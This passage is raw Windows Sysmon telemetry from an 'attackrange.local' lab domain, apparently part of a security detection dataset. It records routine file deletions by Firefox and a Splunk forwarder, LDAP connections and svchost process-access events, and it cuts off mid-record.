Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B25290870D6AD0817133B32E31FE81A6,SHA256=95180366854441918B1A395F30A9A21D7F8FC0F449C0B030546F3D7468E9D950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9D975FC81A7B387E4858AC95191C10BB,SHA256=B94B35824257F9925504DA9BBA6FA90B0357EBCA58120579219A25E58D51A120,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=710808B040AE21CDB087C3E9BC404663,SHA256=89F53BA67E575C1F296E0A4B8158140DE212A2160EBAE4555228E4B0E95B593D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=460282B87930D028B0DF24E78F4646E2,SHA256=D3A0AA6F27178172645B3BB017BDBE39BA57E2A7C1DA459CB388BEE98D69E3EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=33B7BA910580DA63DA25DEF3854722DD,SHA256=0A643619FF4DF954E0D2568050FA85362CC7540BD8FE978A5E1F28DFC998BC25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.241{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1F3D631E892A7B6DE79C3516D97AE1F3,SHA256=7165FD8B2345EFF94BDDD8DC9838C2D6651E69AA91F8BFD8DB89EA0C96F95AF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.240{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C74E1F6A33FC786C71FAA2FB116E2ACC,SHA256=D143886F602570CA849BF1E7DF1FB1C269AE62191178841995BDC03DF44A2FDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.239{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=022C42B4A3195EBD0CF9A1E46756B8EE,SHA256=98834491B6111513F5687BCC46FAE1DD82513627BF01C5708AA1CC54B9B375F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.237{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=815E81943E8322A0631FAF29492053CC,SHA256=56D17000658D78F5EEF737B06CC074518F1E7B0661D5C6110BEBB404A47C6F0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:17.556{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7159E6C5A575931ABF651714B046E6E6,SHA256=52BCA0982A6A6424204E206365433E70F84B512F4A3DC02C3430357BE1F87014,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:17.075{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3831C0D9435B6D2CC93EDA17B5BFE313,SHA256=391F2033DCBA6CD8852A9B6DFE25185EB0FBFF6AE571D4E2DCFADE9AF64018DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:08.730{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51057-false10.0.1.12-8000- 354300x80000000000000001049651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.947{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51056-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001049650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.947{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51056-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001049670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.570{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2624168B40AE420D590A631371E8822D,SHA256=C3B58326BD4236031DCD5DB24793A4487058153834C346861229DE2E2B882C51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:18.107{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C39EAB4279BD2E5A6AA972079893C8B9,SHA256=B07A993D2BA22827AD43C047B0B58D4DA2EC5FF8BEBED51F8CC12A5A18A0E1AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.302{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.086{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001049667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.086{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.086{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001049671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:19.586{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 